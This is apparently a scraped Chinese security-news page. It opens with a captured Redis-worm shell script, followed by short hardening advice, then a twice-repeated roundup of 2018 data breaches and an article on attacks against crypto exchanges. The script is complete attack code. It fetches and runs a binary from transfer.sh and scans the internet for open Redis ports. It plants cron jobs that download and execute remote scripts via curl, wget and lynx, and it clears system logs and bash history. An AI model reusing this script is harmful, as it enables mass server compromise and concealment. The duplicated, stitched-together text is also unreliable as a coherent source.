/root/.bash_historyYUM_PACKAGE_NAME="iptables gcc redis coreutils bash curl wget"DEB_PACKAGE_NAME="coreutils bash build-essential make gcc redis-server redis-tools redis iptables curl"if cat /etc/*release | grep -i CentOS; thenyum clean allyum install -y -q epel-releaseyum install -y -q $YUM_PACKAGE_NAMEelif cat /etc/*release | grep -qi Red; thenyum clean allyum install -y -q epel-releaseyum install -y -q $YUM_PACKAGE_NAMEelif cat /etc/*release | grep -qi Fedora; thenyum clean allyum install -y -q epel-releaseyum install -y -q $YUM_PACKAGE_NAMEelif cat /etc/*release | grep -qi Ubuntu; thenexport DEBIAN_FRONTEND=noninteractiverm -rf /var/lib/apt/lists/*apt-get update -q --fix-missingfor PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; doneelif cat /etc/*release | grep -qi Debian; thenexport DEBIAN_FRONTEND=noninteractiverm -rf /var/lib/apt/lists/*apt-get update --fix-missingfor PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; doneelif cat /etc/*release | grep -qi Mint; thenexport DEBIAN_FRONTEND=noninteractiverm -rf /var/lib/apt/lists/*apt-get update --fix-missingfor PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; doneelif cat /etc/*release | grep -qi Knoppix; thenexport DEBIAN_FRONTEND=noninteractiverm -rf /var/lib/apt/lists/*apt-get update --fix-missingfor PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; doneelseexit 1fisleep 1if ! ( [ -x /usr/local/bin/pnscan ] || [ -x /usr/bin/pnscan ] ); thencurl -kLs https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12 > .x112 || wget -q -O .x112 https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12sleep 1[ -f .x112 ] && tar xf .x112 && cd pnscan-1.12 && make lnx && make install && cd .. && rm -rf pnscan-1.12 .x112fitname=$( mktemp )OMURL=https://transfer.sh/GQCHp/tmp.pZR8v8kihRcurl -s $OMURL > $tname || wget -q -O $tname $OMURLNMURL=$( curl -s --upload-file $tname https://transfer.sh )mv $tname .gpg && chmod +x .gpg && ./.gpg && rm -rf .gpg[ -z "$NMURL" ] && NMURL=$OMURLncmd=$(basename $(mktemp))sed s|"$OMURL"|"$NMURL"|g < .cmd > $ncmdNSURL=$( curl -s --upload-file $ncmd https://transfer.sh )echo flushall > .datecho config set dir /var/spool/cron >> .datecho config set dbfilename root >> .datecho set Backup1 "/t/n*/2 * * * * curl -s ${NSURL} > .cmd && bash .cmd/n/t" >> .datecho set Backup2 "/t/n*/5 * * * * wget -O .cmd ${NSURL} && bash .cmd/n/t" >> .datecho set Backup3 "/t/n*/10 * * * * lynx -source ${NSURL} > .cmd && bash .cmd/n/t" >> .datecho save >> .datecho config set dir /var/spool/cron/crontabs >> .datecho save >> .datecho exit >> .datpnx=pnscan[ -x /usr/local/bin/pnscan ] && pnx=/usr/local/bin/pnscan[ -x /usr/bin/pnscan ] && pnx=/usr/bin/pnscanfor x in $( seq 1 224 | sort -R ); dofor y in $( seq 0 255 | sort -R ); do$pnx -t512 -R 6f 73 3a 4c 69 6e 75 78 -W 2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a $x.$y.0.0/16 6379 > .r.$x.$y.oawk /Linux/ {print $1, $3} .r.$x.$y.o > .r.$x.$y.lwhile read -r h p; docat .dat | redis-cli -h $h -p $p --raw &done < .r.$x.$y.ldonedoneecho 0 > /var/spool/mail/root 2>/dev/nullecho 0 > /var/log/wtmp 2>/dev/nullecho 0 > /var/log/secure 2>/dev/nullecho 0 > /root/.bash_history 2>/dev/nullexit 0

.dat[创建定时任务]

flushallconfig set dir /var/spool/cronconfig set dbfilename rootset Backup1 "/t/n*/2 * * * * curl -s https://transfer.sh/ZShKM/tmp.Nm1jfFNPap > .cmd && bash .cmd/n/t"set Backup2 "/t/n*/5 * * * * wget -O .cmd https://transfer.sh/ZShKM/tmp.Nm1jfFNPap && bash .cmd/n/t"set Backup3 "/t/n*/10 * * * * lynx -source https://transfer.sh/ZShKM/tmp.Nm1jfFNPap > .cmd && bash .cmd/n/t"saveconfig set dir /var/spool/cron/crontabssaveexit

加固建议:

  1. 不要将Redis暴露在公网

  2. 如确实需要,将Redis设置高强度密码并通过白名单限制接入

  3. 定期备份、审查服务器日志

作者:Sp4ce

回顾|2018上半年十大数据泄露事件

2018年才只过去了一半,但是已经被报道的一些数据泄露的规模是令人震惊的。你认为Facebook是最大的一个吗?请再猜一次。

回顾|2018上半年十大数据泄露事件

对于信息安全来说,六个月可以说是一段很长的时间,因此在2018年上半年出现了大量的数据泄露事件,也就不足为奇了。以下是我们汇总的2018年至今被披露的十起规模较大的数据泄露事件,其中包括事件的故事本身以及遭泄露数据的数量。

一、2018上半年十大数据泄露事件

10. Saks和 Lord & Taylor

回顾|2018上半年十大数据泄露事件

  • 泄露数据500万条
  • 披露日期:2018年4月3日

3月底,安全公司Gemini Advisory偶然发现了一个来自JokerStash黑客集团发布的公告,宣称已出售有关500万张被盗信用卡和借记卡的数据。在各种金融机构的协助下,Gemini Advisory公司对这些交易进行了追踪,并最终将这些交易归因于Saks Fifth Avenue和Lord&Taylor的系统入侵。两家百货公司的共同所有者Hudson Bay在了解到这一事件之后,采取了补救措施。但对于Bernadette Beekman来说,这还远远不够,他于2018年4月代表在2017年3月至2018年3月的黑客入侵期间在Lord&Taylor商店使用支付卡消费的所有客户提起了集体诉讼。在她的诉讼中,Beekman称Lord&Taylor“未能遵守安全标准,并在用于保护其客户的财务信息和其他隐私信息的安全措施上‘偷工减料’,而原本这些安全措施本可以防止或减轻安全漏洞所带来的影响。”

9. PumpUp

回顾|2018上半年十大数据泄露事件

  • 泄露数据600万条
  • 披露日期:2018年5月31日

5月31日,ZDNet报道称,安全研究员Oliver Hough联系他们说发现了一台暴露在互联网上的后端服务器,并且没有得到密码。该服务器属于健身应用程序PumpUp,它使得任何能够找到它的人都能访问大量的敏感用户数据,包括用户输入的健康信息、照片以及用户之间发送的私人消息。暴露的数据还包含Facebook访问令牌,在某些情况下还包含未加密的信用卡数据,如卡号、到期日期和信用卡验证值。

当ZDNet与PumpUp取得联系时,该公司并没有做出回应,但它确实悄悄地对服务器实施了保护措施。目前尚不清楚该资产在受到保护之前,已经暴露了多长的时间。

8. Sacramento Bee

回顾|2018上半年十大数据泄露事件

  • 泄露数据1950万条
  • 披露日期:2018年6月7日

今年2月,一名匿名攻击者截获了由Sacramento Bee拥有并运营的两个数据库。其中一个IT资产包含加利福尼亚州州务卿提供的加州选民登记数据,而另一个则存储了用户为订阅该报刊而提供的联系信息。在截获了这些资源之后,攻击者要求支付赎金以换取重新获得对数据的访问权限。Sacramento Bee最终拒绝了这一要求,并删除了数据库,以防止在将来这些数据库在被利用来进行其他更多的攻击。

根据Sacramento Bee的说法,这起黑客攻击事件共暴露了5.3万名订阅者的联系信息以及1940万加州选民的个人数据。

7. Ticketfly

回顾|2018上半年十大数据泄露事件

  • 泄露数据超过2700万条
  • 披露日期:2018年6月7日

5月31日,Ticketfly遭遇了一次攻击,导致音乐会和体育赛事票务网站遭到破坏,并离线和中断一周。据报道,此次攻击事件背后的黑客先是警告Ticketfly存在一个漏洞,并要求其支付赎金。当遭到该公司的拒绝后,黑客劫持了Ticketfly网站,替换了它的主页,用一个包含2700万个Ticketfly账户相关信息(如姓名、家庭住址、电子邮箱地址和电话号码等,涉及员工和用户)的页面。

6. Panera

回顾|2018上半年十大数据泄露事件

  • 泄露数据3700万条
  • 披露日期:2018年4月2日

4月2日,安全研究员Dylan Houlihan联系了调查信息安全记者Brian Krebs,向他讲述了他在2017年8月向Panera Bread报告的一个漏洞。该漏洞导致Panerabread.com以明文泄露客户记录,这些数据可以通过自动化工具进行抓取和索引。Houlihan试图向Panera Bread报告这个漏洞,但他告诉Krebs,他的报告被驳回了。在此后的八个月里,Houlihan每个月都会检查一次这个漏洞,直到最终向Krebs披露。随后,Krebs在他的博客上公布了这些细节。在Krebs 的报告发布后,Panera Bread暂时关闭了起网站。

尽管该公司最初试图淡化此次数据泄露事件的严重程度,并表示受到影响的客户不到1万人,但据信真实数字高达3700万。

5. Facebook

回顾|2018上半年十大数据泄露事件

  • 泄露数据至少8700万条(尽管可能还有更多)
  • 披露日期:2018年3月17日

谁能忘记2018年3月令人震撼的Facebook数据泄露丑闻?当时,有报道称,一家名为Cambridge Analytica的数据分析公司通过一个应用程序收集了5000万Facebook用户的个人信息,该应用程序详细描述了用户的个性、社交网络以及在平台上的参与度。尽管Cambridge Analytica公司声称它只拥有3000万用户的信息,但经过Facebook的确认,最初的估计实际上很低。今年 4月,该公司通知了在其平台上的8700万名用户,他们的数据已经遭到泄露。

不幸的是,随着对Facebook应用程序更深入的审查,看起来Cambridge Analytica丑闻可能只是冰山一角。6月27日,安全研究员Inti De Ceukelaire透露了另一个名为Nametests.com的应用程序,它已经暴露了超过1.2亿用户的信息。

4.  MyHeritage

回顾|2018上半年十大数据泄露事件

  • 泄露数据超过9200万条
  • 披露日期:2018年6月4日

一名安全研究员于6月4日联系了在线家谱平台MyHeritage的首席信息安全官,并透露他们在公司外的私人服务器上找到了一个标有“myheritage”的文件。在检查文件后,MyHeritage的官员确认该资产包含了在2017年10月26日之前已注册MyHeritage的所有用户的电子邮箱地址。该公司发布的一份声明称,由于MyHeritage依赖第三方服务提供商来处理会员的付款,因此它也包含了他们的哈希密码,但不包含支付信息。由于该服务将家谱和DNA数据存储在与存储电子邮箱地址的服务器不同的服务器上,因此MyHeritage表示没有理由相信这些信息已经被暴露或受到损坏。

3. Under Armour

回顾|2018上半年十大数据泄露事件

  • 泄露数据5亿条
  • 披露日期:2018年5月25日

3月25日,Under Armour获悉有人未经授权访问了MyFitnessPal平台,这是一个用于跟踪用户饮食和锻炼情况的平台。美国全国广播公司财经频道(CNBC)在当时报道说,负责此次黑客入侵的犯罪分子访问了用户的用户名、电子邮件地址和哈希密码。但没有暴露用户的付款信息,因为Under Armour对这些数据进行了分别处理。同时,它也没有损害社会安全号码或驾驶执照号码,因为服装制造商表示它并不会收集此类数据。

据信,超过1.5亿MyFitnessPal用户的信息在数据泄露中受到了损害。

2. Exactis

回顾|2018上半年十大数据泄露事件

  • 泄露数据超过4亿条
  • 披露日期:2018年6月26日

安全研究员Vinny Troia在2018年6月发现,总部位于佛罗里达州的市场营销和数据聚合公司Exactis已将一个数据库暴露在可公开访问的服务器上。该数据库包含2TB的信息,其中包括数亿美国人和企业的详细信息。在撰写本文时,Exactis尚未确认受此事件影响的确切人数,但Troia表示他能够找到近3.4亿条个人记录。他还向Wired证实,此事件暴露了消费者的电子邮箱地址、实际地址、电话号码以及一系列的其他个人信息,在某些情况下包括极其敏感的细节,如孩子的姓名和性别。

1. Aadhaar

回顾|2018上半年十大数据泄露事件

  • 泄露数据11亿条
  • 披露日期:2018年1月3日

今年1月份,论坛报业集团(Tribune News Service)的记者为WhatsApp上匿名卖家提供的一项出售登录凭证的服务支付了500卢比。通过这项服务,记者可以输入任何一个Aadhaar号码(一个12位的唯一标识符,每个印度公民会使用到它)检索印度唯一身份识别管理局(UIDAI)存储的关于被查询公民的诸多类型的信息。这些数据包括姓名、住址、照片、电话号码和电子邮箱地址。在向卖家额外支付300卢比的费用后,任何人都可以通过该软件打印某个Aadhaar号码归属者的身份证。

据信,这起数据泄露事件已经损害了在印度注册的11亿公民的个人信息。

二、其他值得注意的数据泄露事件

1. Strava

2017年11月,健身追踪应用程序Strava有意发布了一份包含1300万用户活动轨迹的“热图”。这张地图让我们了解了世界各地的人们是如何利用Strava来实现他们的健身目标的。但正如Bleeping Computer在1月底报道的那样,它也起到了意想不到的作用。联合冲突分析研究所(Institute for United Conflict analyst)的分析师Nathan Ruser于2018年1月发现,该地图显示了军事基地的位置。这是通过在已知军事设施所在的偏远地区展示人们的身体活动来发现的,其中包括美军基地以及土耳其和俄罗斯基地。

2. Health South East RHF

今年年初,挪威卫生安全部门HelseCERT检测到了异常的计算机活动。它最终将这种可疑行为追溯到了作为挪威四大区域医疗保健组织之一的Health South East RHF。根据Security Affairs的报道,HelseCERT发现这起攻击是由一群“专业的”和“高端的”攻击者发起的。

在HelseCERT披露此事件后,挪威卫生与护理部澄清说,该国采取了各种安全措施来解决这一问题。

受攻击影响的人数确切人数尚不清楚。但考虑到Health South East RHF的覆盖范围,可能有290万人(超过挪威总人口的一半)成为了事件的受害者。

3. [24]7.ai

4月4日,西尔斯控股公司(Sears Holding Corporation)和达美航空公司(Delta Airlines)都公布了属于数十万客户数据遭泄露的消息。这些数据是通过[24]7.ai的数据泄露而暴露出来的,这是一种提供在线聊天支持的第三方服务。

根据达美航空的声明,这起黑客入侵事件被认为发生在2017年9月26日至2017年10月12日期间,可能泄露了信用卡信息,但受影响的客户数量不详。该航空公司强调,没有其他信息(如护照、身份证或SkyMiles信息)受到影响。西尔斯估计,可能有少于10万名客户的信用卡信息在此次黑客入侵中被曝光。 一天后,零售商百思买(Best Buy)宣布,其一小部分客户可能也受到了此次事件的影响。

4. Orbitz

3月1日,Orbitz 发现 有人未经授权访问了它的一个遗留的旅行预订平台。这家在线旅行社认为,攻击者有能力查看某些敏感信息,包括客户姓名、出生日期、电话号码、电子邮箱地址、帐单地址、性别和支付卡信息。但没有证据表明这一事件暴露了客户的护照、旅行路线或社会安全号码。

根据彭博(Bloomberg)报道,黑客可能在2017年10月1日至2017年12月22日期间访问了88万名客户的支付卡详细信息。

三、令人不安的上半年

根据身份盗窃资源中心(ITRC)的2017年数据泄露总结报告,在2018年第一季度和第二季度遭泄露数据的数量已经超过了2017年全年遭泄露数据数量的总和。值得注意的是,本文所提供的数据泄露事件列表远远谈不上全面。在2018年上半年发生了许多其他的数据泄露事件,这意味着遭泄露数据的数量实际上要多得多。不过,也只有时间才能够证明这是否属实。

2018上半年规模最大的十起数据泄露事件

2018上半年规模最大的十起数据泄露事件

2018年才只过去了一半,但是已经被报道的一些数据泄露的规模是令人震惊的。你认为Facebook是最大的一个吗?请再猜一次。

对于信息安全来说,六个月可以说是一段很长的时间,因此在2018年上半年出现了大量的数据泄露事件,也就不足为奇了。以下是我们汇总的2018年至今被披露的十起规模较大的数据泄露事件,其中包括事件的故事本身以及遭泄露数据的数量。

10) Saks和 Lord & Taylor

2018上半年规模最大的十起数据泄露事件

  • 泄露数据500万条
  • 披露日期:2018年4月3日

3月底,安全公司Gemini Advisory偶然发现了一个来自JokerStash黑客集团发布的公告,宣称已出售有关500万张被盗信用卡和借记卡的数据。在各种金融机构的协助下,Gemini Advisory公司对这些交易进行了追踪,并最终将这些交易归因于Saks Fifth Avenue和Lord&Taylor的系统入侵。两家百货公司的共同所有者Hudson Bay在了解到这一事件之后,采取了补救措施。但对于Bernadette Beekman来说,这还远远不够,他于2018年4月代表在2017年3月至2018年3月的黑客入侵期间在Lord&Taylor商店使用支付卡消费的所有客户提起了集体诉讼。在她的诉讼中,Beekman称Lord&Taylor“未能遵守安全标准,并在用于保护其客户的财务信息和其他隐私信息的安全措施上‘偷工减料’,而原本这些安全措施本可以防止或减轻安全漏洞所带来的影响。”

9)PumpUp

2018上半年规模最大的十起数据泄露事件

  • 泄露数据600万条
  • 披露日期:2018年5月31日

5月31日,ZDNet报道称,安全研究员Oliver Hough联系他们说发现了一台暴露在互联网上的后端服务器,并且没有得到密码。该服务器属于健身应用程序PumpUp,它使得任何能够找到它的人都能访问大量的敏感用户数据,包括用户输入的健康信息、照片以及用户之间发送的私人消息。暴露的数据还包含Facebook访问令牌,在某些情况下还包含未加密的信用卡数据,如卡号、到期日期和信用卡验证值。

当ZDNet与PumpUp取得联系时,该公司并没有做出回应,但它确实悄悄地对服务器实施了保护措施。目前尚不清楚该资产在受到保护之前,已经暴露了多长的时间。

8) Sacramento Bee

2018上半年规模最大的十起数据泄露事件

  • 泄露数据1950万条
  • 披露日期:2018年6月7日

今年2月,一名匿名攻击者截获了由Sacramento Bee拥有并运营的两个数据库。其中一个IT资产包含加利福尼亚州州务卿提供的加州选民登记数据,而另一个则存储了用户为订阅该报刊而提供的联系信息。在截获了这些资源之后,攻击者要求支付赎金以换取重新获得对数据的访问权限。Sacramento Bee最终拒绝了这一要求,并删除了数据库,以防止在将来这些数据库在被利用来进行其他更多的攻击。

根据Sacramento Bee的说法,这起黑客攻击事件共暴露了5.3万名订阅者的联系信息以及1940万加州选民的个人数据。

7)Ticketfly

2018上半年规模最大的十起数据泄露事件

  • 泄露数据超过2700万条
  • 披露日期:2018年6月7日

5月31日,Ticketfly遭遇了一次攻击,导致音乐会和体育赛事票务网站遭到破坏,并离线和中断一周。据报道,此次攻击事件背后的黑客先是警告Ticketfly存在一个漏洞,并要求其支付赎金。当遭到该公司的拒绝后,黑客劫持了Ticketfly网站,替换了它的主页,用一个包含2700万个Ticketfly账户相关信息(如姓名、家庭住址、电子邮箱地址和电话号码等,涉及员工和用户)的页面。

6)Panera

2018上半年规模最大的十起数据泄露事件

  • 泄露数据3700万条
  • 披露日期:2018年4月2日

4月2日,安全研究员Dylan Houlihan联系了调查信息安全记者Brian Krebs,向他讲述了他在2017年8月向Panera Bread报告的一个漏洞。该漏洞导致Panerabread.com以明文泄露客户记录,这些数据可以通过自动化工具进行抓取和索引。Houlihan试图向Panera Bread报告这个漏洞,但他告诉Krebs,他的报告被驳回了。在此后的八个月里,Houlihan每个月都会检查一次这个漏洞,直到最终向Krebs披露。随后,Krebs在他的博客上公布了这些细节。在Krebs 的报告发布后,Panera Bread暂时关闭了起网站。

尽管该公司最初试图淡化此次数据泄露事件的严重程度,并表示受到影响的客户不到1万人,但据信真实数字高达3700万。

5)Facebook

2018上半年规模最大的十起数据泄露事件

  • 泄露数据至少8700万条(尽管可能还有更多)
  • 披露日期:2018年3月17日

谁能忘记2018年3月令人震撼的Facebook数据泄露丑闻?当时,有报道称,一家名为Cambridge Analytica的数据分析公司通过一个应用程序收集了5000万Facebook用户的个人信息,该应用程序详细描述了用户的个性、社交网络以及在平台上的参与度。尽管Cambridge Analytica公司声称它只拥有3000万用户的信息,但经过Facebook的确认,最初的估计实际上很低。今年 4月,该公司通知了在其平台上的8700万名用户,他们的数据已经遭到泄露。

不幸的是,随着对Facebook应用程序更深入的审查,看起来Cambridge Analytica丑闻可能只是冰山一角。6月27日,安全研究员Inti De Ceukelaire透露了另一个名为Nametests.com的应用程序,它已经暴露了超过1.2亿用户的信息。

4) MyHeritage

2018上半年规模最大的十起数据泄露事件

  • 泄露数据超过9200万条
  • 披露日期:2018年6月4日

一名安全研究员于6月4日联系了在线家谱平台MyHeritage的首席信息安全官,并透露他们在公司外的私人服务器上找到了一个标有“myheritage”的文件。在检查文件后,MyHeritage的官员确认该资产包含了在2017年10月26日之前已注册MyHeritage的所有用户的电子邮箱地址。该公司发布的一份声明称,由于MyHeritage依赖第三方服务提供商来处理会员的付款,因此它也包含了他们的哈希密码,但不包含支付信息。由于该服务将家谱和DNA数据存储在与存储电子邮箱地址的服务器不同的服务器上,因此MyHeritage表示没有理由相信这些信息已经被暴露或受到损坏。

3)Under Armour

2018上半年规模最大的十起数据泄露事件

  • 泄露数据5亿条
  • 披露日期:2018年5月25日

3月25日,Under Armour获悉有人未经授权访问了MyFitnessPal平台,这是一个用于跟踪用户饮食和锻炼情况的平台。美国全国广播公司财经频道(CNBC)在当时报道说,负责此次黑客入侵的犯罪分子访问了用户的用户名、电子邮件地址和哈希密码。但没有暴露用户的付款信息,因为Under Armour对这些数据进行了分别处理。同时,它也没有损害社会安全号码或驾驶执照号码,因为服装制造商表示它并不会收集此类数据。

据信,超过1.5亿MyFitnessPal用户的信息在数据泄露中受到了损害。

2)Exactis

2018上半年规模最大的十起数据泄露事件

  • 泄露数据超过4亿条
  • 披露日期:2018年6月26日

安全研究员Vinny Troia在2018年6月发现,总部位于佛罗里达州的市场营销和数据聚合公司Exactis已将一个数据库暴露在可公开访问的服务器上。该数据库包含2TB的信息,其中包括数亿美国人和企业的详细信息。在撰写本文时,Exactis尚未确认受此事件影响的确切人数,但Troia表示他能够找到近3.4亿条个人记录。他还向Wired证实,此事件暴露了消费者的电子邮箱地址、实际地址、电话号码以及一系列的其他个人信息,在某些情况下包括极其敏感的细节,如孩子的姓名和性别。

1)Aadhaar

2018上半年规模最大的十起数据泄露事件

  • 泄露数据11亿条
  • 披露日期:2018年1月3日

今年1月份,论坛报业集团(Tribune News Service)的记者为WhatsApp上匿名卖家提供的一项出售登录凭证的服务支付了500卢比。通过这项服务,记者可以输入任何一个Aadhaar号码(一个12位的唯一标识符,每个印度公民会使用到它)检索印度唯一身份识别管理局(UIDAI)存储的关于被查询公民的诸多类型的信息。这些数据包括姓名、住址、照片、电话号码和电子邮箱地址。在向卖家额外支付300卢比的费用后,任何人都可以通过该软件打印某个Aadhaar号码归属者的身份证。

据信,这起数据泄露事件已经损害了在印度注册的11亿公民的个人信息。

其他值得注意的数据泄露事件

Strava

2017年11月,健身追踪应用程序Strava有意发布了一份包含1300万用户活动轨迹的“热图”。这张地图让我们了解了世界各地的人们是如何利用Strava来实现他们的健身目标的。但正如Bleeping Computer在1月底报道的那样,它也起到了意想不到的作用。联合冲突分析研究所(Institute for United Conflict analyst)的分析师Nathan Ruser于2018年1月发现,该地图显示了军事基地的位置。这是通过在已知军事设施所在的偏远地区展示人们的身体活动来发现的,其中包括美军基地以及土耳其和俄罗斯基地。

Health South East RHF

今年年初,挪威卫生安全部门HelseCERT检测到了异常的计算机活动。它最终将这种可疑行为追溯到了作为挪威四大区域医疗保健组织之一的Health South East RHF。根据Security Affairs的报道,HelseCERT发现这起攻击是由一群“专业的”和“高端的”攻击者发起的。

在HelseCERT披露此事件后,挪威卫生与护理部澄清说,该国采取了各种安全措施来解决这一问题。

受攻击影响的人数确切人数尚不清楚。但考虑到Health South East RHF的覆盖范围,可能有290万人(超过挪威总人口的一半)成为了事件的受害者。

[24]7.ai

4月4日,西尔斯控股公司(Sears Holding Corporation)和达美航空公司(Delta Airlines)都公布了属于数十万客户数据遭泄露的消息。这些数据是通过[24]7.ai的数据泄露而暴露出来的,这是一种提供在线聊天支持的第三方服务。

根据达美航空的声明,这起黑客入侵事件被认为发生在2017年9月26日至2017年10月12日期间,可能泄露了信用卡信息,但受影响的客户数量不详。该航空公司强调,没有其他信息(如护照、身份证或SkyMiles信息)受到影响。西尔斯估计,可能有少于10万名客户的信用卡信息在此次黑客入侵中被曝光。 一天后,零售商百思买(Best Buy)宣布,其一小部分客户可能也受到了此次事件的影响。

Orbitz

3月1日,Orbitz  发现 有人未经授权访问了它的一个遗留的旅行预订平台。这家在线旅行社认为,攻击者有能力查看某些敏感信息,包括客户姓名、出生日期、电话号码、电子邮箱地址、帐单地址、性别和支付卡信息。但没有证据表明这一事件暴露了客户的护照、旅行路线或社会安全号码。

根据彭博(Bloomberg)报道,黑客可能在2017年10月1日至2017年12月22日期间访问了88万名客户的支付卡详细信息。

令人不安的上半年

根据身份盗窃资源中心(ITRC)的2017年数据泄露总结报告,在2018年第一季度和第二季度遭泄露数据的数量已经超过了2017年全年遭泄露数据数量的总和。值得注意的是,本文所提供的数据泄露事件列表远远谈不上全面。在2018年上半年发生了许多其他的数据泄露事件,这意味着遭泄露数据的数量实际上要多得多。不过,也只有时间才能够证明这是否属实。

 

本文由 黑客视界 综合网络整理,图片源自网络;转载请注明“转自黑客视界”,并附上链接。

面对黑客种种手段,不要瑟瑟发抖!本文教你如何保护自己的加密资产

由于数字货币市场不断下跌,许多散户投资者开始对这个蓬勃发展的行业失去兴趣。尽管如此,加密货币业务仍在不断发展和扩展。这主要适用于专业的交易平台。虽然失败的投资者感到非常无助,但新的参与者依然在不断进入市场,包括高盛和纽约证券交易所的母公司洲际交易所(ICE)。

虽然一些拥有很少专业技能的投资者正在放弃这项业务,但这些知名企业才刚刚开辟出具有巨大潜力的新领域。但是,与此同时,网络犯罪分子很可能会更加瞄准这个行业。

安全分析师挑选出黑客或者其它不法分子用来攻击加密货币交易平台的几种主要技术和方法,并强调了每个用户都应遵循的应对措施。

面对黑客种种手段,不要瑟瑟发抖!本文教你如何保护自己的加密资产

网络钓鱼邮件

想象一下以下场景:你正在使用的加密货币交易所的安全系统声称在你的帐户中检测到可疑活动。为此,该系统向你的电子邮件地址发送通知。该邮件包含一个链接并建议你立即更改密码,以防资金被盗。

尽管这个计划非常简单,但实际上许多新手都会上钩并掉进陷阱中。如果你点开链接,通常需要填写几项内容:旧密码、新密码和确认新密码。这样,尽管交易者试图保持对加密货币的控制,却在不知不觉中将它们交给了骗子。

有几个简单的规则可以保证你的安全:

1.不要打开来自未知来源的电子邮件;

2.请勿将你的个人信息发送给第三方;

3.仔细检查发件人的电子邮件地址:来自交易所的邮件通常是从官方域名发出。

网络钓鱼网站

显然,所有加密货币交易者都是受过教育的人。但是,当在地址栏中正确输入交易所的名称或通过超链接访问其网站时,许多人都会忽略拼写错误,忽略了浏览器中丢失的安全验证图标

一旦这些不幸的交易者输入了他们的用户名和密码,犯罪分子几乎获得他们访问帐户所需的所有凭证。避免这种欺诈的唯一方法是密切关注细节,交易平台的网络钓鱼平台不太可能在不久的将来消失。

安全措施有以下:

1.为你经常访问的交易网站添加书签,只需点击此书签即可访问该网站;

2.始终使用具有加密保护功能的VPN

电子邮件劫持

与账户本身一样,链接到加密交易所帐户中的电子邮件也经常被黑客劫持。控制了你的电子邮件后,犯罪分子可以发送密码恢复请求,设置新的临时密码并轻松将加密货币转移到自己的钱包中。

在这种情况下,双因素身份验证(2FA)是最有效的保护机制,可防止第三方访问你的帐户。

TeamViewer作为切入点

遗憾的是,如果Google身份验证器是嵌入在PC上Web浏览器的,即使是双因素身份验证也无法确保完全的安全。安装TeamViewer工具后,攻击者可能会实时访问TOTP身份验证代码,并利用它们侵入并获取你在留在交易所中的个人信息。

只要应用程序安装在其他设备(如智能手机)上,2FA的保护作用就会一直有效。这大大降低了被劫持的风险。

许多加密货币交易所用户忽视了基本的安全措施,因为他们盲目相信自己永远不会像Mt. Gox和Coincheck的客户那样遇到麻烦。然而,即使是最精密最复杂的交易平台也有许多隐蔽的漏洞,不法分子可能会利用这些漏洞来攻击系统。

有些人可能会发现启用双因素身份验证是多余的,但你应该始终牢记黑客在智商上甚至可以胜过最成功的交易者。因此,必须遵循一些基本和简单的指导原则,这些指南将显著降低黑客攻击和诈骗之后丢失资产的风险。

发文时比特币价格 ¥44446.19

原文:https://www.ccn.com/the-common-tactics-used-to-hack-a-cryptocurrency-exchange/

作者:David Balaban

编译:Apatheticco

稿源(译):巴比特资讯(http://www.8btc.com/‎the-common-tactics-used-to-hack-a-cryptocurrency-exchange) 版权声明:

作者保留权利。文章为作者独立观点,不代表巴比特立场。